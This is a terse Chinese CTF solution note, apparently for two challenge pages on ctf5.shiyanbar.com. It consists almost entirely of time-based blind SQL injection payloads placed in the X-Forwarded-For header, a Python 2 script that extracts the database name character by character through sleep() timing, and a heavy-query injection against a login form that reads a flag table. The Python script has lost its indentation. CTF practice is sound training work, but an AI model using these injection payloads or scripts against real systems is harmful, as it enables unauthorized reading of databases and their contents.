基于时间的盲注
- 127.0.0.1' and (select case when ascii(substring((select database()) from 1 for 1))<128 then sleep(4) else 1 end) or '1
基于时间的盲注
http://ctf5.shiyanbar.com/web/wonderkun/index.php
http://ctf5.shiyanbar.com/web/baocuo/index.php
X-Forwarded-For
X-Forwarded-For: 127.0.0.1
X-Forwarded-For: 127.0.0.1' and sleep(3) or '1
X-Forwarded-For: 127.0.0.1' and (select case when ascii(substring((select database()) from 1 for 1))=119 then sleep(6) else 1 end ) or '1
py:
import requests
url='http://ctf5.shiyanbar.com/web/wonderkun/index.php'
dic='abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789{}_@#$%^&*()'
flag=''
for i in xrange(1,50):
for x in dic:
headers={"X-Forwarded-For":"x' + (select case when substring((select database()) from %d for 1)='%s' then sleep(6) else 1 end ) or '1" %(i,x)}
try:
res=requests.get(url,headers=headers,timeout=6)
except requests.exceptions.ReadTimeout,e:
flag=flag+x
print flag
break
print flag
baocuo:
username=0' || /*
&password=*/ if((select value from ffll44jj) regexp '^fl',(select count(*) from information_schema.columns A,information_schema.columns B, information_schema.columns C),0) or '0